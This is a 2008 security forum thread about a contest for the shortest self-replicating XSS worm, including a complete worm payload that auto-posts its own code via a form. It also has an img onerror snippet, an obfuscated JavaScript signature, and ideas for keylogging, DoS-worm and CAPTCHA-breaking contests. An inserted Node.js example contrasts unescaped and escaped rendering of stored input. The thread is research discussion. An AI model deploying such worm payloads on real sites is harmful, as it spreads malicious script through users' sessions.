Q and A for any cross site scripting information. Feel free to ask away. 
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 11, 2008 03:51PM

@rsnake

re code:-
<img src="" onerror="write('<body><b>Hello</b>');close();alert(body.innerHTML)" />

I don't think it even matters if there is a <body> tag anyways. Maybe on IE

When is someone gonna sign up to slackers with morpheus as a username? Then we can ask for the red pill :)

"The Matrix is everywhere, it is all around us. Even now, in this very room. You can see it when you look out your window, or when you turn on your television. You can feel it when you go to work, or when go to church or when you pay your taxes. It is the world that has been pulled over your eyes to blind you from the truth."

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 11, 2008 04:29PM

I think we have a neo - but I also think _any_ forum has a neo :)

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 11, 2008 08:16PM

lol... I almost choked on my tortillas and a fine ale here.. :))

Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 12, 2008 11:33AM

@Gareth - true that does work, but there you aren't making an assumption about a body tag since you are putting it there. ;)

- RSnake
Gotta love it. http://ha.ckers.org

Re: Diminutive XSS Worm Replication Contest
Posted by: dbloom
Date: January 13, 2008 04:52AM

Quote

dbloom - 252 Posts to the wrong page (resides in the same directory)
<body onfocus=with(document)[c=["%3"]+"E",body.innerHTML=unescape("<form\tmethod=post\taction=/post.php"+c+"<textarea\tname=content"+c+"<body\tonfocus="+(onfocus+c).replace(/[\s\x7B\x7D\x3B]|^[^\)]*\)/g,"")+"</body"+c),forms[0].submit(),alert("xss")]>

The rules said:
Quote

2) must self replicate the entire payload to a page called "post.php" as a parameter called "content" on the same domain (must be POSTed to that URL, no GETs please). We'll assume post.php will properly URL unescape your code.
A page called post.php on the same domain means this to me: domain.tld/post.php
And I asked about it here: http://sla.ckers.org/forum/read.php?2,18790,page=10#msg-19113

I'm not asking you to disqualify everyone else or anything (that would be really unfair), but I don't think I broke the rules here.

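Added example, not from the thread or from any contestant: a small Node.js stand-in for the contest's post.php that shows two things the rule quoted above hinges on, where a form action actually lands relative to the page hosting the payload (the point in dispute here), and what a raw echo of the stored "content" parameter does compared with an HTML-escaped one. The page path /forum/read.php and the sample request body are constructed.

```javascript
// Resolve a form action the way a browser would, relative to the page URL,
// and report whether the target stays on the same origin (rule 2).
function resolveAction(pageUrl, action) {
  const page = new URL(pageUrl);
  const target = new URL(action, page);
  return { href: target.href, sameOrigin: target.origin === page.origin };
}

// Parse an application/x-www-form-urlencoded body and URL-unescape it,
// which is what the rule assumes post.php does with the "content" parameter.
function parseContent(body) {
  return new URLSearchParams(body).get("content");
}

// Escape the five characters that let stored text break out into markup.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  }[c]));
}

// Vulnerable rendering: stored content is inlined unchanged, so whatever was
// posted as "content" runs again for the next visitor (the replication step).
function renderUnsafe(content) {
  return `<div class="post">${content}</div>`;
}

// Hardened rendering: the same content is shown as inert text.
function renderSafe(content) {
  return `<div class="post">${escapeHtml(content)}</div>`;
}

// Constructed sample: a harmless stand-in for a contest entry, encoded the
// way a browser encodes a <textarea name="content"> on submit.
const SAMPLE_BODY =
  "content=" + encodeURIComponent('<body onfocus=alert("xss")>');

function demo() {
  const content = parseContent(SAMPLE_BODY);
  return {
    // action="/post.php" resolves to the domain root, as dbloom read the rule
    rootAction: resolveAction("http://domain.tld/forum/read.php", "/post.php"),
    // action="post.php" resolves into the hosting page's directory
    relativeAction: resolveAction("http://domain.tld/forum/read.php", "post.php"),
    unsafe: renderUnsafe(content),
    safe: renderSafe(content),
  };
}
```
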
Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 13, 2008 11:14AM

@dbloom - this wouldn't have won either way, or I may have considered it since it would have actually been shorter just to delete it. Either way, it was a nice submission!

- RSnake

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 13, 2008 02:58PM

@rsnake

When is the next one? I need something to satisfy my boredom

Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 13, 2008 09:11PM

Well - what do you guys think would be a good contest? I'll take suggestions if you guys have something you'd like to see done. Obviously it would have to be challenging and fun for everyone involved.

- RSnake

Re: Diminutive XSS Worm Replication Contest
Posted by: digi7al64
Date: January 13, 2008 11:47PM

I think we should continue with worms, but rather than make it diminutive let's go for polymorphism or C&C's.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: Diminutive XSS Worm Replication Contest
Posted by: dbloom
Date: January 13, 2008 11:59PM

Ideas for another contest:
* Some characters should be disallowed or mangled in some way (PHP magic quotes, anyone?)
* Having a popular Javascript library preinstalled on the target site
* A multi-site worm (must spread to different domains that are vulnerable under different attack vectors if the user is logged into said sites, presumably using IFRAMEs)
* Fixed number of generations - the worm must spread exactly (n) times then stop.
* Multiple small input fields - the worm must be made of 100 byte maximum chunks that are not necessarily presented in any order

Re: Diminutive XSS Worm Replication Contest
Posted by: Kyran
Date: January 14, 2008 02:04AM

dbloom Wrote:
-------------------------------------------------------
> Ideas for another contest:
> * Some characters should be disallowed or mangled
> in some way (PHP magic quotes, anyone?)
> * Having a popular Javascript library preinstalled
> on the target site
> * A multi-site worm (must spread to different
> domains that are vulnerable under different attack
> vectors if the user is logged into said sites,
> presumably using IFRAMEs)
> * Fixed number of generations - the worm must
> spread exactly (n) times then stop.
> * Multiple small input fields - the worm must be
> made of 100 byte maximum chunks that are not
> necessarily presented in any order

No offense, but I seriously doubt any of these are contest-esque. I can see them as interesting topics, perhaps.
(The last one is my favorite. add to window.var, setinterval, if window.var.length=x, eval(window.var);clearinterval, etc. )

- Kyran

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 14, 2008 02:28AM

I agree with Kyran - the last one sounds most promising. I also like the idea with certain forbidden characters - quotes would be a candidate for that. But anyway - let's brainstorm a bit before we lock on creating another worm next time. What about a data-miner, a spider etc. ?

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 14, 2008 03:10AM

How about an unsolvable problem like a CAPTCHA? See what we can come up with.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 14, 2008 08:05AM

Or gathering most functionality inside a fixed amount of characters. Let's say the code may have 400 characters and has several optional tasks to solve. E.g.:

- Logging keys
- Communicating with another site
- Keeping the user on the site
- Obfuscating the status bar content
- Mutate etc...

Any of those sub-quests can be given a nn% score and the code has to match several rules like running on IE7/FF - also with optional bonus scores for Opera, Safari etc.

It would on the one hand be relatively easy to judge and on the other hand a big problem to solve for the contestants.

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 14, 2008 10:10AM

How about a team based challenge as well?

Other ideas:-
-Browser crashing
-SOP Bypass
-Filter challenge
-DOS Worm
-XSS Virus

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 14, 2008 10:57AM

Thing is IMHO we shouldn't try too hard to put the focus on malicious code.

Re: Diminutive XSS Worm Replication Contest
Posted by: DoctorDan
Date: January 14, 2008 11:58AM

Haha, yeah, I agree with .mario. How about more of a "stop this worm" contest than a "DoS worm" contest. The diminutive worm contest was academic, because it doesn't really arm anybody with potential weapons. It was very "proof of concept" and not so employable (especially for those who are not already proficient in this area). I don't expect to see any of these payloads in the next major XSS worm. How about a contest that will produce some new thoughts and perhaps a few papers. We're here to better the field, right?

-Dan

EDIT: I would also like to say that I think the contest should be very open. It should be one in which the final result can be achieved in numerous ways, and the entries should be posted publicly for a sort of collaboration (just like the last contest). It should be on a topic that we don't feel completely comfortable with, something we haven't "mastered".

Re: Diminutive XSS Worm Replication Contest
Posted by: Matt Presson
Date: January 14, 2008 03:07PM

Absolutely agree with the above comments. The last thing we should do is arm "Script Kiddies" with ammo that they can bring down sites with.

-----------------------------------------------------------------------
(ú=(θ='',[µ=!(Φ=!θ+{})+θ,Θ=Φ[ø=+!θ]+Φ[+θ],ĩ=µ[ø],Ø=µ[º=ø+++ø],Ç=Φ[º+ø],à=ú[Φ[º+º]+Φ[+θ]+Ç+ĩ]][Ø+Ç+Θ])())[ĩ+à('•êí')](Ç+à('Á«)'))

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 14, 2008 03:30PM

Yeah, I agree. I don't want to arm script kiddies, but on the other hand I don't want to stop researching cool security stuff. I think if we find a good balance like the previous contest it would be cool.

Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 14, 2008 05:03PM

The worm contest was designed to help us solve a problem by getting lots of potential candidates so we could examine the way in which worms are written, and in my mind we solved it. Let's move onto the next problem. I did like the CAPTCHA thing. One thing I have been wrestling with for years now is a way to mathematically or logically explain why CAPTCHAs can't work (at least not as a real Turing test) so we can stop talking about them. In lieu of that, it would actually be kinda fun to build a few CAPTCHAs and have everyone submit code that will break it. The highest percentage of successful solutions wins. The only catch here is that the code (like PWNTcha) would have to be portable and work on multiple CAPTCHAs. The more the better.

The downside is that it would definitely empower a lot of spammers, so perhaps that idea is out.

Similar candidates would be welcome.

- RSnake

Re: Diminutive XSS Worm Replication Contest
Posted by: Kyran
Date: January 15, 2008 12:36AM

Maybe we should stop naming these contests, just to lessen the drama...
Anyways, I totally agree with trying to play with CAPTCHAs more.
Perhaps someone could write xss.php and captcha.php, the former just being an easily xssable page and the latter being a page that will generate different variations of captchas(?mode=1/2/3) and the goal is to perform an action and bypass the captcha purely in Javascript and/or with as little interaction as possible.

- Kyran

Re: Diminutive XSS Worm Replication Contest
Posted by: Matt Presson
Date: January 15, 2008 09:36AM

I have developed a CAPTCHA system in PHP, but have yet to find any place that I could test the "strength" of the image. I looked at the PWNtcha site, but sadly you can't upload images there.

Does anyone know of such a site?

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 15, 2008 04:43PM

Matt:
www.puremango.co.uk has a captcha breaker somewhere

Greetz!!

*edit*

http://www.puremango.co.uk/_acdc_breakcaptcha.php

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Diminutive XSS Worm Replication Contest
Posted by: Matt Presson
Date: January 16, 2008 08:28AM

Thanks sdc. Guess I will have to look at it at home. Work here has blocked it.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 22, 2008 08:32PM

How about a challenge to find a Flash based vulnerability? It's a good way of learning it while you do it. My experience with Flash is only on the design side, I haven't exploited it yet or even glanced at it. Or a LiveConnect Javascript exploit (it's tough, lemme tell ya). Such stuff would be fun, and it gives a reason to get off our asses. :)

Re: Diminutive XSS Worm Replication Contest
Posted by: Matt Presson
Date: January 23, 2008 10:54AM

Ronald's could be a good idea, and since Flash can bypass the SOP, the winners would be determined by their ability to post some text, possibly their user name and date, to another site.
